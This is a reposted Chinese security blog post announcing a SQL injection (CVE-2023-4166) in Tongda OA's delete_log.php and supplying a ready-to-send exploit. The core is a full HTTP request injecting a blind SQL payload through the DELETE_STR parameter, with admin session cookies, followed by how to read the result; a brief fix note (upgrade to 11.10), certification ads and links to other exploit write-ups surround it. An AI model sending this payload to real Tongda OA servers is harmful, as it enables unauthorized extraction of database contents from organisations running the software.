漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

admin 2023年8月9日18:19:58评论204 views字数 1734阅读5分46秒阅读模式

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

0x01 前言

通达OA中发现一个漏洞,并被列为严重漏洞。该漏洞影响文件general/system/seal_manage/dianju/delete_log.php的未知代码。对参数 DELETE_STR 的操作会导致 sql 注入

0x02 影响平台

本地测试环境 v11.7  其他版本未知

0x03 漏洞复现

还是辣个熟悉的页面~~

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

EXP:

GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1Host: 192.168.232.137:8098User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46Upgrade-Insecure-Requests: 1

本地环境的数据库为TD_OA

在ASCII码中84代表的是 T 

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

反之如果不是便是这个酱紫

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

0x04 参考来源

https://mp.weixin.qq.com/s/37VKi2Az7LX9G9wVYe6POQhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4166

0x05 修复方案

该漏洞已向公众披露并可能被使用。升级到版本11.10可以解决这个问题。建议升级受影响的组件。


漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

网 安 考 证漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜

CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001...

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

23hvv红蓝py交流群,共享资源 一起py漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP) 

不定期福利赠送

群满可以后台加vx备注py 邀请进群漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)


【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细 | 钟馗之眼】ZoomEye-python命令行的使用

【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

  记一次HW实战笔记 | 艰难的提权爬坑

走过路过的大佬们留个关注再走呗漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

往期文章有彩蛋哦漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)


原文始发于微信公众号(渗透Xiao白帽):漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月9日18:19:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞速递 | 通达OA_CVE-2023-4166漏洞(附EXP)https://cn-sec.com/archives/1943531.html

发表评论

匿名网友 填写信息